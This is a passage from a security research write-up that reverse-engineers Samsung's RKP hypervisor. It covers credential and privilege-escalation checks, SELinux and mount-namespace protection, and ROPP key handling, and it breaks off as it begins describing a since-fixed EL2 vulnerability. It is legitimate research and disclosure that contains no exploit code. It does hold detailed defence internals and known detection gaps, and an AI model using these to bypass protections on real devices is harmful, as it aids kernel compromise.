    parent_cred_va = *(parent_task + 8 * rkp_cred->TASK_CRED_OFFSET);
    // Convert the parent cred structure from a VA to a PA.
    parent_cred = rkp_get_pa(parent_cred_va);
    // Get the type field from the parent cred structure.
    parent_flags = *(parent_cred + 8 * rkp_cred->CRED_FLAGS_OFFSET);
    // If the parent task is marked as `CRED_FLAG_MARK_PPT`.
    if ((parent_flags & CRED_FLAG_MARK_PPT) != 0) {
      // Mark the new task as `CRED_FLAG_CHILD_PPT`.
      *(targ_cred_ro + 8 * rkp_cred->CRED_FLAGS_OFFSET) |= CRED_FLAG_CHILD_PPT;
    }
  }
}

Let's now go over the different functions that are called by rkp_assign_creds. In particular, the functions that try to detect privilege escalation are really interesting from a security standpoint.

The rkp_ns_get_current function returns the current task of the kernel (stored in SP_EL0 or SP_EL1).

uint64_t rkp_ns_get_current() {
  // SPSel, Stack Pointer Select.
  //
  // SP, bit [0]: Stack pointer to use.
  if (get_sp_sel()) {
    return get_sp_el0();
  } else {
    return get_sp_el1();
  }
}

The rkp_check_pe function is called for non "Linux on Dex" processes when the device is locked. For each UID, GID, EUID, and EGID pair for the target RW cred and current cred structure, it calls the check_pe_id function to decide if this is an instance of privilege escalation. For effective IDs, the target one must also be lower than the current one. Otherwise, it is not considered privilege escalation.

bool rkp_check_pe(int64_t targ_cred, int64_t curr_cred) {
  // ...

  // Get the uid field of the current cred structure.
  curr_uid = *(curr_cred + 4 * rkp_cred->CRED_UID_OFFSET);
  // Get the uid field of the target RW cred structure.
  targ_uid = *(targ_cred + 4 * rkp_cred->CRED_UID_OFFSET);
  // Call `check_pe_id` to detect privilege escalation.
  if (check_pe_id(targ_uid, curr_uid)) {
    return 1;
  }
  // Get the gid field of the current cred structure.
  curr_gid = *(curr_cred + 4 * rkp_cred->CRED_GID_OFFSET);
  // Get the gid field of the target RW cred structure.
  targ_gid = *(targ_cred + 4 * rkp_cred->CRED_GID_OFFSET);
  // Call `check_pe_id` to detect privilege escalation.
  if (check_pe_id(targ_gid, curr_gid)) {
    return 1;
  }
  // Get the euid field of the current cred structure.
  curr_euid = *(curr_cred + 4 * rkp_cred->CRED_EUID_OFFSET);
  // Get the euid field of the target RW cred structure.
  targ_euid = *(targ_cred + 4 * rkp_cred->CRED_EUID_OFFSET);
  // If the target euid is lower than the current one and `check_pe_id` returns true, this is privilege escalation.
  if (targ_euid < curr_uid && check_pe_id(targ_euid, curr_euid)) {
    return 1;
  }
  // Get the egid field of the current cred structure.
  curr_egid = *(curr_cred + 4 * rkp_cred->CRED_EGID_OFFSET);
  // Get the egid field of the target RW cred structure.
  targ_egid = *(targ_cred + 4 * rkp_cred->CRED_EGID_OFFSET);
  // If the target egid is lower than the current one and `check_pe_id` returns true, this is privilege escalation.
  if (targ_egid < curr_gid && check_pe_id(targ_egid, curr_egid)) {
    return 1;
  }
  return 0;
}

check_pe_id returns true if the current ID is greater than 1000 and the target ID is lower than or equal to 1000 (SYSTEM).

int64_t check_pe_id(uint32_t targ_id, uint32_t curr_id) {
  // PE is detected if the current ID is bigger and the target ID is smaller or equal to `SYSTEM` (1000).
  return curr_id > 1000 && targ_id <= 1000;
}
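
To give a concrete idea of the scope of this check, here is a small standalone sketch (using hypothetical IDs that are not taken from a real device) that runs a few pairs through the same comparison. Note that, because the current ID must be strictly greater than 1000, a change from SYSTEM to root would not be flagged by this particular check:

#include <stdint.h>
#include <stdio.h>

// Same comparison as check_pe_id above.
static int64_t check_pe_id(uint32_t targ_id, uint32_t curr_id) {
  return curr_id > 1000 && targ_id <= 1000;
}

int main(void) {
  // Untrusted app (uid 10123) obtaining root (uid 0) credentials: detected.
  printf("%d\n", (int)check_pe_id(0, 10123));
  // Untrusted app obtaining SYSTEM (uid 1000) credentials: detected.
  printf("%d\n", (int)check_pe_id(1000, 10123));
  // SYSTEM obtaining root credentials: not detected, since 1000 is not > 1000.
  printf("%d\n", (int)check_pe_id(0, 1000));
  return 0;
}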

from_zyg_adbd is called under the same conditions as rkp_check_pe. It returns true if the current task is marked CRED_FLAG_CHILD_PPT or if it is a child of zygote, zygote64, or adbd.

int64_t from_zyg_adbd(int64_t curr_task, int64_t curr_cred) {
  // ...

  // Get the type field from the current cred structure.
  curr_flags = *(curr_cred + 8 * rkp_cred->CRED_FLAGS_OFFSET);
  // If the current task is marked as CRED_FLAG_CHILD_PPT, return true.
  if ((curr_flags & CRED_FLAG_CHILD_PPT) != 0) {
    return 1;
  }
  // Iterate on the parents of the current task_struct.
  task = curr_task;
  while (1) {
    // Get the pid field of the parent task_struct.
    task_pid = *(task + 4 * rkp_cred->TASK_PID_OFFSET);
    // If the parent pid is zero, return false.
    if (!task_pid) {
      return 0;
    }
    // Get the comm field of the parent task_struct.
    task_comm = task + 8 * rkp_cred->TASK_COMM_OFFSET;
    // Copy the task name into a local buffer.
    memcpy(comm, task_comm, sizeof(comm));
    // If the parent task is zygote, zygote64 or adbd, return true.
    if (!strcmp(comm, "zygote") || !strcmp(comm, "zygote64") || !strcmp(comm, "adbd")) {
      return 1;
    }
    // Get the parent field of the parent task_struct.
    parent_va = *(task + 8 * rkp_cred->TASK_PARENT_OFFSET);
    // Convert the parent task_struct from a VA to a PA.
    task = parent_pa = rkp_get_pa(parent_va);
  }
}

check_privilege_escalation is called for each UID, EUID, GID, and EGID pair of the target RW cred and current cred structures. It returns true if the current ID is LOD prefixed (0x61a8xxxx) while the target ID is not, and the target ID is not equal to -1.

bool check_privilege_escalation(int32_t targ_id, int32_t curr_id) {
  // PE is detected if the current ID is LOD prefixed but the target ID is not, and the target ID is not -1.
  return ((curr_id - 0x61a80000) <= 0xffff && (targ_id - 0x61a80000) > 0xffff && targ_id != -1);
}
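
Rewritten with explicit unsigned arithmetic, this range check boils down to testing whether an ID lies within [0x61a80000, 0x61a8ffff]. Here is a minimal standalone sketch, again using hypothetical IDs, that shows when the detection fires:

#include <stdint.h>
#include <stdio.h>

// An ID is "LOD prefixed" if it lies in [0x61a80000, 0x61a8ffff].
static int is_lod(uint32_t id) {
  return id - 0x61a80000u <= 0xffffu;
}

// Same logic as check_privilege_escalation above, made explicit.
static int check_privilege_escalation(uint32_t targ_id, uint32_t curr_id) {
  return is_lod(curr_id) && !is_lod(targ_id) && targ_id != (uint32_t)-1;
}

int main(void) {
  // A LOD task (uid 0x61a803e8) switching to SYSTEM (1000): detected.
  printf("%d\n", check_privilege_escalation(1000, 0x61a803e8));
  // A LOD task switching to another LOD ID: allowed.
  printf("%d\n", check_privilege_escalation(0x61a80001, 0x61a803e8));
  // A target ID of -1 is explicitly exempted.
  printf("%d\n", check_privilege_escalation((uint32_t)-1, 0x61a803e8));
  return 0;
}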

When privilege escalation is detected in rkp_assign_creds, rkp_privilege_escalation is called. It simply triggers a policy violation.

int64_t rkp_privilege_escalation(int64_t targ_cred, int64_t curr_cred, int64_t flag) {
  uh_log('L', "rkp_kdp.c", 461, "Priv Escalation - Current %lx %lx %lx", *(curr_cred + 4 * rkp_cred->CRED_UID_OFFSET),
         *(curr_cred + 4 * rkp_cred->CRED_GID_OFFSET), *(curr_cred + 4 * rkp_cred->CRED_EGID_OFFSET));
  uh_log('L', "rkp_kdp.c", 462, "Priv Escalation - Passed %lx %lx %lx", *(targ_cred + 4 * rkp_cred->CRED_UID_OFFSET),
         *(targ_cred + 4 * rkp_cred->CRED_GID_OFFSET), *(targ_cred + 4 * rkp_cred->CRED_EGID_OFFSET));
  return rkp_policy_violation("KDP Privilege Escalation %lx %lx %lx", targ_cred, curr_cred, flag);
}

The chk_invalid_sec_ptr function is called to verify that the new task_security_struct is valid (aligned on the structure size) and hypervisor-protected (marked as SEC_PTR in the physmap).

int64_t chk_invalid_sec_ptr(uint64_t sec_ptr) {
  rkp_phys_map_lock(sec_ptr);
  // The start and end addresses of the task_security_struct must be marked as `SEC_PTR` on the physmap, and it must
  // also be aligned on the size of this structure.
  if (!sec_ptr || !is_phys_map_sec_ptr(sec_ptr) || !is_phys_map_sec_ptr(sec_ptr + rkp_cred->SP_SIZE - 1) ||
      sec_ptr != sec_ptr / rkp_cred->SP_BUFF_SIZE * rkp_cred->SP_BUFF_SIZE) {
    uh_log('L', "rkp_kdp.c", 186, "Invalid Sec Pointer %lx %lx %lx", is_phys_map_sec_ptr(sec_ptr), sec_ptr,
           sec_ptr - sec_ptr / rkp_cred->SP_BUFF_SIZE * rkp_cred->SP_BUFF_SIZE);
    rkp_phys_map_unlock(sec_ptr);
    return 1;
  }
  rkp_phys_map_unlock(sec_ptr);
  return 0;
}

SELinux Initialization

In addition to protecting the task_security_struct of tasks and making the selinux_enforcing and selinux_enabled global variables read-only, Samsung RKP also protects ss_initialized. This global variable, which indicates if SELinux is initialized, was targeted in a previous RKP bypass. To set this variable after the policy has been loaded, the kernel calls the hypervisor in the security_load_policy function. This function invokes the RKP_KDP_X60 command.

int security_load_policy(void *data, size_t len)
{
    // ...
        uh_call(UH_APP_RKP, RKP_KDP_X60, (u64)&ss_initialized, 1, 0, 0);
    // ...
}

On the hypervisor side, this command is handled by the rkp_cmd_selinux_initialized function, which calls rkp_selinux_initialized. This function ensures ss_initialized is located in the kernel's rodata section and that the kernel is setting it to 1, before performing the write.

void rkp_selinux_initialized(saved_regs_t* regs) {
  // ...

  // Get the VA of `ss_initialized` from register x2.
  ss_initialized_va = regs->x2;
  // Get the value to set it to from register x3.
  value = regs->x3;
  // Convert the VA of `ss_initialized` to a PA.
  ss_initialized = rkp_get_pa(ss_initialized_va);
  if (ss_initialized) {
    // Ensure the `ss_initialized` is located in the kernel rodata section.
    if (ss_initialized_va < SRODATA || ss_initialized_va > ERODATA) {
      // Trigger a policy violation if it isn't.
      rkp_policy_violation("RKP_ba9b5794 %lxRKP_69d2a377%lx, %lxRKP_ba5ec51d", ss_initialized_va);
    }
    // Ensure it is located at the same address that was set in `rkp_cred_init` and provided by the kernel in
    // `kdp_init`.
    else if (ss_initialized == rkp_cred->SS_INITIALIZED_VA) {
      // The global variable can only be set to 1, never to any other value.
      if (value == 1) {
        // Perform the write on behalf of the kernel.
        *ss_initialized = value;
        uh_log('L', "rkp_kdp.c", 1199, "RKP_3a152688 %d", 1);
      } else {
        // Trigger a policy violation for other values.
        rkp_policy_violation("RKP_3ba4a93d");
      }
    }
    // Not sure what this is about. SELINUX is the PA of the selinux field of the rkp_init_t structure located on the
    // stack of the kernel function `kdp_init`. Maybe this is here to support older or future kernel versions?
    else if (ss_initialized == rkp_cred->SELINUX) {
      // The write is allowed if the new value is 1, or if the current value is not already 1.
      if (value == 1 || *ss_initialized != 1) {
        // Perform the write on behalf of the kernel.
        *ss_initialized = value;
        uh_log('L', "rkp_kdp.c", 1212, "RKP_8df36e46 %d", value);
      } else {
        // Trigger a policy violation for other values.
        rkp_policy_violation("RKP_cef38ae5");
      }
    }
    // Trigger a policy violation if the address is unexpected.
    else {
      rkp_policy_violation("RKP_ced87e02");
    }
  } else {
    uh_log('L', "rkp_kdp.c", 1181, "RKP_0a7ac3b1\n");
  }
}

Mount Namespaces Protection

One last feature offered by the hypervisor is the protection of the mount namespaces (a set of filesystem mounts that are visible to a process).

Kernel Structures

The vfsmount instances, like the cred and task_security_struct structure instances, are allocated in read-only pages. This structure also gets a new field for storing the back-pointer to the mount structure that owns this instance.

struct vfsmount {
    // ...
    struct mount *bp_mount; /* pointer to mount*/
    // ...
} __randomize_layout;

The mount structure was also modified to contain a pointer to the vfsmount structure, instead of the structure itself.

struct mount {
    // ...
    struct vfsmount *mnt;
    // ...
} __randomize_layout;

In the Credentials Protection section, we explained that the security_integrity_current function is called in each SELinux security hook and that this function calls cmp_ns_integrity to verify the integrity of the mount namespace.

cmp_ns_integrity retrieves the nsproxy structure (that contains pointers to all per-process namespaces) for the current task, the mnt_namespace from it, and the root mount from this structure. The integrity verification is then performed by checking if the back-pointer of the vfsmount structure points to the mount structure.

extern u8 ns_prot;
unsigned int cmp_ns_integrity(void)
{
    struct mount *root = NULL;
    struct nsproxy *nsp = NULL;
    int ret = 0;

    if((in_interrupt()
         || in_softirq())){
        return 0;
    }
    nsp = current->nsproxy;
    if(!ns_prot || !nsp ||
        !nsp->mnt_ns) {
        return 0;
    }
    root = current->nsproxy->mnt_ns->root;
    if(root != root->mnt->bp_mount){
        printk("\n RKP44_3 Name Space Mismatch %p != %p\n nsp = %p mnt_ns %p\n",root,root->mnt->bp_mount,nsp,nsp->mnt_ns);
        ret = 1;
    }
    return ret;
}

Namespace Initialization

The vfsmount structures are allocated in the mnt_alloc_vfsmount function, using the read-only vfsmnt_cache cache. This function calls rkp_init_ns to initialize the back-pointer.

static int mnt_alloc_vfsmount(struct mount *mnt)
{
    struct vfsmount *vfsmnt = NULL;

    vfsmnt = kmem_cache_alloc(vfsmnt_cache, GFP_KERNEL);
    if(!vfsmnt)
        return 1;

    spin_lock(&mnt_vfsmnt_lock);
    rkp_init_ns(vfsmnt,mnt);
//  vfsmnt->bp_mount = mnt;
    mnt->mnt = vfsmnt;
    spin_unlock(&mnt_vfsmnt_lock);
    return 0;
}

And rkp_init_ns simply invokes the RKP_KDP_X52 command, passing it the vfsmount and mount instances.

void rkp_init_ns(struct vfsmount *vfsmnt,struct mount *mnt)
{
    uh_call(UH_APP_RKP, RKP_KDP_X52, (u64)vfsmnt, (u64)mnt, 0, 0);
}

On the hypervisor side, the command is handled by the rkp_cmd_init_ns function, which calls rkp_init_ns_hyp. It calls chk_invalid_ns to verify that the new vfsmount structure is valid before zeroing it and setting its back-pointer to the mount instance.

void rkp_init_ns_hyp(saved_regs_t* regs) {
  // ...

  // Convert the VA of the vfsmount structure into a PA.
  vfsmnt = rkp_get_pa(regs->x2);
  // Ensure the structure is valid and hypervisor-protected.
  if (!chk_invalid_ns(vfsmnt)) {
    // Reset all of its content.
    memset(vfsmnt, 0, rkp_cred->NS_SIZE);
    // Set the back-pointer to the mount structure given as argument.
    *(vfsmnt + 8 * rkp_cred->BPMNT_VFSMNT_OFFSET) = regs->x3;
  }
}

chk_invalid_ns verifies that the new vfsmount instance is valid (aligned on the structure size) and is hypervisor-protected (marked as NS in the physmap).

int64_t chk_invalid_ns(uint64_t vfsmnt) {
  // The vfsmount instance must be aligned on the size of the structure.
  if (!vfsmnt || vfsmnt != vfsmnt / rkp_cred->NS_BUFF_SIZE * rkp_cred->NS_BUFF_SIZE) {
    return 1;
  }
  rkp_phys_map_lock(vfsmnt);
  // Ensure it is marked as `NS` in the physmap.
  if (!is_phys_map_ns(vfsmnt)) {
    uh_log('L', "rkp_kdp.c", 882, "Name space physmap verification failed !!!!! %lx", vfsmnt);
    rkp_phys_map_unlock(vfsmnt);
    return 1;
  }
  rkp_phys_map_unlock(vfsmnt);
  return 0;
}

Setting Fields

The vfsmount structure contains various fields that need to be changed at some point by the kernel. Similarly to other protected structures, it cannot do that by itself and needs to call into the hypervisor instead.

The table below lists, for each field, the kernel function invoking the command and the hypervisor function handling that command.

Field Kernel Function Hypervisor Function
mnt_root/mnt_sb rkp_set_mnt_root_sb rkp_cmd_ns_set_root_sb
mnt_flags rkp_assign_mnt_flags rkp_cmd_ns_set_flags
data rkp_set_data rkp_cmd_ns_set_data

The mnt_root field, a pointer to the root of the mounted tree, which is an instance of the dentry structure, and the mnt_sb field, a pointer to the super_block structure, are changed using the rkp_set_mnt_root_sb function, which invokes the RKP_KDP_X53 command.

void rkp_set_mnt_root_sb(struct vfsmount *mnt,  struct dentry *mnt_root,struct super_block *mnt_sb)
{
    uh_call(UH_APP_RKP, RKP_KDP_X53, (u64)mnt, (u64)mnt_root, (u64)mnt_sb, 0);
}

This command is handled by the rkp_cmd_ns_set_root_sb hypervisor function, which calls rkp_ns_set_root_sb. This function calls chk_invalid_ns to check the vfsmount integrity and sets its mnt_root and mnt_sb fields to the values provided as arguments.

void rkp_ns_set_root_sb(saved_regs_t* regs) {
  // ...

  // Convert the vfsmount structure VA into a PA.
  vfsmnt = rkp_get_pa(regs->x2);
  // Ensure the structure is valid and hypervisor-protected.
  if (!chk_invalid_ns(vfsmnt)) {
    // Set the mnt_root field of the vfsmount structure to the dentry instance.
    *vfsmnt = regs->x3;
    // Set the mnt_sb field of the vfsmount structure to the super_block instance.
    *(vfsmnt + 8 * rkp_cred->SB_VFSMNT_OFFSET) = regs->x4;
  }
}

The mnt_flags field, which contains flags such as MNT_NOSUID, MNT_NODEV, MNT_NOEXEC, etc., is changed using the rkp_assign_mnt_flags function, which invokes the RKP_KDP_X54 command.

void rkp_assign_mnt_flags(struct vfsmount *mnt,int flags)
{
    uh_call(UH_APP_RKP, RKP_KDP_X54, (u64)mnt, (u64)flags, 0, 0);
}

Two other functions call rkp_assign_mnt_flags. The first one, rkp_set_mnt_flags, is used to set one or more flags.

void rkp_set_mnt_flags(struct vfsmount *mnt,int flags)
{
    int f = mnt->mnt_flags;
    f |= flags;
    rkp_assign_mnt_flags(mnt,f);
}

Unsurprisingly, the second one, rkp_reset_mnt_flags, is used to unset one or more flags.

void rkp_reset_mnt_flags(struct vfsmount *mnt,int flags)
{
    int f = mnt->mnt_flags;
    f &= ~flags;
    rkp_assign_mnt_flags(mnt,f);
}

This command is handled by the rkp_cmd_ns_set_flags hypervisor function, which calls rkp_ns_set_flags. This function calls chk_invalid_ns to check the vfsmount integrity and sets its flags field to the value provided as an argument.

void rkp_ns_set_flags(saved_regs_t* regs) {
  // ...

  // Convert the vfsmount structure VA into a PA.
  vfsmnt = rkp_get_pa(regs->x2);
  // Ensure the structure is valid and hypervisor-protected.
  if (!chk_invalid_ns(vfsmnt)) {
    // Set the flags field of the vfsmount structure.
    *(vfsmnt + 4 * rkp_cred->FLAGS_VFSMNT_OFFSET) = regs->x3;
  }
}

The data field, which contains type-specific data, is changed using the rkp_set_data function, which invokes the RKP_KDP_X55 command.

void rkp_set_data(struct vfsmount *mnt,void *data)
{
    uh_call(UH_APP_RKP, RKP_KDP_X55, (u64)mnt, (u64)data, 0, 0);
}

This command is handled by the rkp_cmd_ns_set_data hypervisor function, which calls rkp_ns_set_data. This function calls chk_invalid_ns to check the vfsmount integrity, and sets its data field to the value provided as an argument.

void rkp_ns_set_data(saved_regs_t* regs) {
  // ...

  // Convert the vfsmount structure VA into a PA.
  vfsmnt = rkp_get_pa(regs->x2);
  // Ensure the structure is valid and hypervisor-protected.
  if (!chk_invalid_ns(vfsmnt)) {
    // Set the data field of the vfsmount structure.
    *(vfsmnt + 8 * rkp_cred->DATA_VFSMNT_OFFSET) = regs->x3;
  }
}

New Mount

The last command that is called as part of the namespace protection feature is RKP_KDP_X56. It is invoked by the rkp_populate_sb function when a new mount is being created. This function checks the path of the mount point against the list below and only calls the hypervisor if the path is one of them.

  • /root
  • /product
  • /system
  • /vendor
  • /apex/com.android.runtime
  • /com.android.runtime@1

int art_count = 0;

static void rkp_populate_sb(char *mount_point, struct vfsmount *mnt) 
{
    if (!mount_point || !mnt)
        return;

    if (!odm_sb &&
        !strncmp(mount_point, KDP_MOUNT_PRODUCT, KDP_MOUNT_PRODUCT_LEN)) {
        uh_call(UH_APP_RKP, RKP_KDP_X56, (u64)&odm_sb, (u64)mnt, KDP_SB_ODM, 0);
    } else if (!rootfs_sb &&
        !strncmp(mount_point, KDP_MOUNT_ROOTFS, KDP_MOUNT_ROOTFS_LEN)) {
        uh_call(UH_APP_RKP, RKP_KDP_X56, (u64)&rootfs_sb, (u64)mnt, KDP_SB_SYS, 0);
    } else if (!sys_sb &&
        !strncmp(mount_point, KDP_MOUNT_SYSTEM, KDP_MOUNT_SYSTEM_LEN)) {
        uh_call(UH_APP_RKP, RKP_KDP_X56, (u64)&sys_sb, (u64)mnt, KDP_SB_SYS, 0);
    } else if (!vendor_sb &&
        !strncmp(mount_point, KDP_MOUNT_VENDOR, KDP_MOUNT_VENDOR_LEN)) {
        uh_call(UH_APP_RKP, RKP_KDP_X56, (u64)&vendor_sb, (u64)mnt, KDP_SB_VENDOR, 0);
    } else if (!art_sb &&
        !strncmp(mount_point, KDP_MOUNT_ART, KDP_MOUNT_ART_LEN - 1)) {
        uh_call(UH_APP_RKP, RKP_KDP_X56, (u64)&art_sb, (u64)mnt, KDP_SB_ART, 0);
    } else if ((art_count < ART_ALLOW) &&
        !strncmp(mount_point, KDP_MOUNT_ART2, KDP_MOUNT_ART2_LEN - 1)) {
        if (art_count)
            uh_call(UH_APP_RKP, RKP_KDP_X56, (u64)&art_sb, (u64)mnt, KDP_SB_ART, 0);
        art_count++;
    }
}

rkp_populate_sb is called from do_new_mount, which itself is called from do_mount.

static int do_new_mount(struct path *path, const char *fstype, int sb_flags,
            int mnt_flags, const char *name, void *data)
{
    // ...
    buf = kzalloc(PATH_MAX, GFP_KERNEL);
    if (!buf){
        kfree(buf);
        return -ENOMEM;
    }
    dir_name = dentry_path_raw(path->dentry, buf, PATH_MAX);

    if(!sys_sb || !odm_sb || !vendor_sb || !rootfs_sb || !art_sb || (art_count < ART_ALLOW)) 
        rkp_populate_sb(dir_name,mnt);

    kfree(buf);
    // ...
}

On the hypervisor side, the command is handled by rkp_cmd_ns_set_sys_vfsmnt, which calls rkp_ns_set_sys_vfsmnt. It ensures the vfsmount structure given as an argument is valid by calling chk_invalid_ns. It then copies its mnt_sb field, the pointer to the superblock of the source file system mount, into the destination superblock pointer before storing this value again in one of the fields of the rkp_cred structure.

void rkp_ns_set_sys_vfsmnt(saved_regs_t* regs) {
  // ...

  // If the `rkp_cred` structure is not initialized, i.e. `rkp_cred_init` has not been called.
  if (!rkp_cred) {
    uh_log('W', "rkp_kdp.c", 931, "RKP_ae6cae81");
    return;
  }
  // Convert the destination superblock VA to a PA.
  dst_sb = rkp_get_pa(regs->x2);
  // Convert the source file system mount VA to a PA.
  vfsmnt = rkp_get_pa(regs->x3);
  // Get the enum value indicating which mount point this is.
  mount_point = regs->x4;
  // Ensure the vfsmnt structure is valid and hypervisor-protected.
  if (!vfsmnt || chk_invalid_ns(vfsmnt) || mount_point >= KDP_SB_MAX) {
    uh_log('L', "rkp_kdp.c", 945, "Invalid  source vfsmnt  %lx %lx %lx\n", regs->x3, vfsmnt, mount_point);
    return;
  }
  // Sanity-check: the destination superblock must not be NULL.
  if (!dst_sb) {
    uh_log('L', "rkp_kdp.c", 956, "dst_sb is NULL %lx %lx %lx\n", regs->x2, 0, regs->x3);
    return;
  }
  // Get the mnt_sb field (pointer to superblock) of the vfsmount structure.
  mnt_sb = *(vfsmnt + 8 * rkp_cred->SB_VFSMNT_OFFSET);
  // Set the pointer to the destination superblock to the mnt_sb field value.
  *dst_sb = mnt_sb;
  // Depending on the mount point, set the corresponding field of the `rkp_cred` structure.
  switch (mount_point) {
    case KDP_SB_ROOTFS:
      *rkp_cred->SB_ROOTFS = mnt_sb;
      break;
    case KDP_SB_ODM:
      *rkp_cred->SB_ODM = mnt_sb;
      break;
    case KDP_SB_SYS:
      *rkp_cred->SB_SYS = mnt_sb;
      break;
    case KDP_SB_VENDOR:
      *rkp_cred->SB_VENDOR = mnt_sb;
      break;
    case KDP_SB_ART:
      *rkp_cred->SB_ART = mnt_sb;
      break;
  }
}

Executable Loading

The mount namespace protection feature enables additional checking when executable binaries are loaded by the kernel. The verifications happen in the flush_old_exec function, which is called from the loaders of the supported binary formats (see this LWN.net article). This mechanism also prevents the abuse of the call_usermodehelper function that has been used in a previous Samsung RKP bypass.

If the current task is privileged (determined by calling is_rkp_priv_task), the flush_old_exec function calls invalid_drive to ensure the executable's mount point is valid. If it is not, it makes the kernel panic.

int flush_old_exec(struct linux_binprm * bprm)
{
    // ...
    if(rkp_cred_enable &&
        is_rkp_priv_task() && 
        invalid_drive(bprm)) {
        panic("\n KDP_NS_PROT: Illegal Execution of file #%s#\n", bprm->filename);
    }
    // ...
}

is_rkp_priv_task simply checks if any of the UID, EUID, GID, or EGID of the current task is below or equal to 1000 (SYSTEM).

#define RKP_CRED_SYS_ID 1000

static int is_rkp_priv_task(void)
{
    struct cred *cred = (struct cred *)current_cred();

    if(cred->uid.val <= (uid_t)RKP_CRED_SYS_ID || cred->euid.val <= (uid_t)RKP_CRED_SYS_ID ||
        cred->gid.val <= (gid_t)RKP_CRED_SYS_ID || cred->egid.val <= (gid_t)RKP_CRED_SYS_ID ){
        return 1;
    }
    return 0;
}

invalid_drive first retrieves the vfsmount structure from the file structure of the binary being loaded. It ensures it is hypervisor-protected by calling rkp_ro_page (though that doesn't mean it is necessarily of the expected type). It then passes its superblock to the kdp_check_sb_mismatch function to determine whether or not the mount point is valid.

static int invalid_drive(struct linux_binprm * bprm) 
{
    struct super_block *sb =  NULL;
    struct vfsmount *vfsmnt = NULL;

    vfsmnt = bprm->file->f_path.mnt;
    if(!vfsmnt || 
        !rkp_ro_page((unsigned long)vfsmnt)) {
        printk("\nInvalid Drive #%s# #%p#\n",bprm->filename, vfsmnt);
        return 1;
    } 
    sb = vfsmnt->mnt_sb;

    if(kdp_check_sb_mismatch(sb)) {
        printk("\n Superblock Mismatch #%s# vfsmnt #%p#sb #%p:%p:%p:%p:%p:%p#\n",
                    bprm->filename, vfsmnt, sb, rootfs_sb, sys_sb, odm_sb, vendor_sb, art_sb);
        return 1;
    }

    return 0;
}

If the device is neither in recovery mode nor unlocked, kdp_check_sb_mismatch compares the superblock to the allowed ones, i.e. those of /root, /system, /product, /vendor, and /apex/com.android.runtime. For instance, a privileged process trying to execute a binary located on another mount point, such as /data, would fail this check and make flush_old_exec panic.

static int kdp_check_sb_mismatch(struct super_block *sb) 
{   
    if(is_recovery || __check_verifiedboot) {
        return 0;
    }
    if((sb != rootfs_sb) && (sb != sys_sb)
        && (sb != odm_sb) && (sb != vendor_sb) && (sb != art_sb)) {
        return 1;
    }
    return 0;
}

JOPP and ROPP Commands

We explained in the section about Kernel Exploitation that JOPP is only enabled on the high-end Samsung devices and ROPP on the high-end Snapdragon devices. For this subsection about the hypervisor commands related to these features, we will be looking at the kernel source code and RKP binary for a Snapdragon device (the US version of the S10).

We believe the initialization commands of JOPP and ROPP in the hypervisor, rkp_cmd_jopp_init and rkp_cmd_ropp_init, respectively, are called by the bootloader (S-Boot), though we couldn't confirm it.

The first command handler, rkp_cmd_jopp_init, does nothing interesting.

int64_t rkp_cmd_jopp_init() {
  uh_log('L', "rkp.c", 502, "CFP JOPP Enabled");
  return 0;
}

The second command handler, rkp_cmd_ropp_init, expects an argument structure that needs to start with a magic value (0x4A4C4955). This structure is copied to a fixed physical address (0xB0240020). If the memory at another physical address (0x80001000) contains a second magic value (0xCDEFCDEF), the structure is also copied to a third physical address (0x80001020).

int64_t rkp_cmd_ropp_init(saved_regs_t* regs) {
  // ...

  // Convert the argument structure VA to a PA.
  arg_struct = virt_to_phys_el1(regs->x2);
  // Check if it begins with the expected magic value.
  if (*arg_struct == 0x4a4c4955) {
    // Copy the structure to a fixed physical address.
    memcpy(0xb0240020, arg_struct, 80);
    // If the memory at another PA contains another magic value.
    if (*(uint32_t*)0x80001000 == 0xcdefcdef) {
      // Copy the structure to another fixed PA.
      memcpy(0x80001020, arg_struct, 80);
    }
    uh_log('L', "rkp.c", 529, "CFP ROPP Enabled");
  } else {
    uh_log('W', "rkp.c", 515, "RKP_e08bc280");
  }
  return 0;
}

In addition, ROPP uses two more commands, rkp_cmd_ropp_save and rkp_cmd_ropp_reload, that deal with the "master key".

rkp_cmd_ropp_save does nothing and is probably called by the bootloader, but we again couldn't confirm it.

int64_t rkp_cmd_ropp_save() {
  return 0;
}

rkp_cmd_ropp_reload is called by the kernel in the ropp_secondary_init assembly macro.

/*
 * secondary core will start a forked thread, so rrk is already enc'ed
 * so only need to reload the master key and thread key
 */
    .macro ropp_secondary_init ti
    reset_sysreg
    //load master key from rkp
    ropp_load_mk
    //load thread key
    ropp_load_key \ti
    .endm

    .macro ropp_load_mk
#ifdef CONFIG_UH
    push    x0, x1
    push    x2, x3
    push    x4, x5
    mov x1, #0x10 //RKP_ROPP_RELOAD
    mov x0, #0xc002 //UH_APP_RKP
    movk    x0, #0xc300, lsl #16
    smc #0x0
    pop x4, x5
    pop x2, x3
    pop x0, x1
#else
    push    x0, x1
    ldr x0, = ropp_master_key
    ldr x0, [x0]
    msr RRMK, x0
    pop x0, x1
#endif
    .endm

This macro is called from the __secondary_switched assembly function, which is executed when a secondary core is being booted.

__secondary_switched:
    // ...
    ropp_secondary_init x2
    // ...
ENDPROC(__secondary_switched)

The command handler itself, rkp_cmd_ropp_reload, sets the system register DBGBVR5_EL1 (which holds the RRMK, the "master key" used by the ROPP feature) to a value read from a fixed physical address (0xB0240028).

int64_t rkp_cmd_ropp_reload() {
  set_dbgbvr5_el1(*(uint32_t*)0xb0240028);
  return 0;
}

This completes our explanations about Samsung RKP's inner workings. We have detailed how the hypervisor is initialized, how it handles exceptions coming from lower ELs, and how it processes the kernel page tables — all of that to protect critical kernel data structures that might be targeted in an exploit.

Vulnerability

We will now reveal a vulnerability that we found, which has since been fixed, and that allows getting code execution at EL2. We will exploit this vulnerability on our Exynos device, but it should also work on Snapdragon devices with some minor changes.

Here is some information about the binaries that we are looking at:

  • Exynos device - Samsung A51 (SM-A515F)
    • Firmware version: A515FXXU3BTF4
    • Hypervisor version: Feb 27 2020
  • Snapdragon device - Samsung Galaxy S10 (SM-G973U)
    • Firmware version: G973USQU4ETH7
    • Hypervisor version: Feb 25 2020

Description

If you have been paying close attention while reading this blog post, you might have noticed two important functions that we haven't detailed yet: uh_log and rkp_get_pa. Let's go over them now, starting with uh_log.

uh_log does some fairly standard string formatting and printing, which we have omitted from the snippet below, but it also does other things. If the log level that was given as the first argument is 'D' (debug), then it also calls uh_panic. This will become important in a moment...

int64_t uh_log(char level, const char* filename, uint32_t linenum, const char* message, ...) {
  // ...

  // ...
  if (level == 'D') {
    uh_panic();
  }
  return res;
}

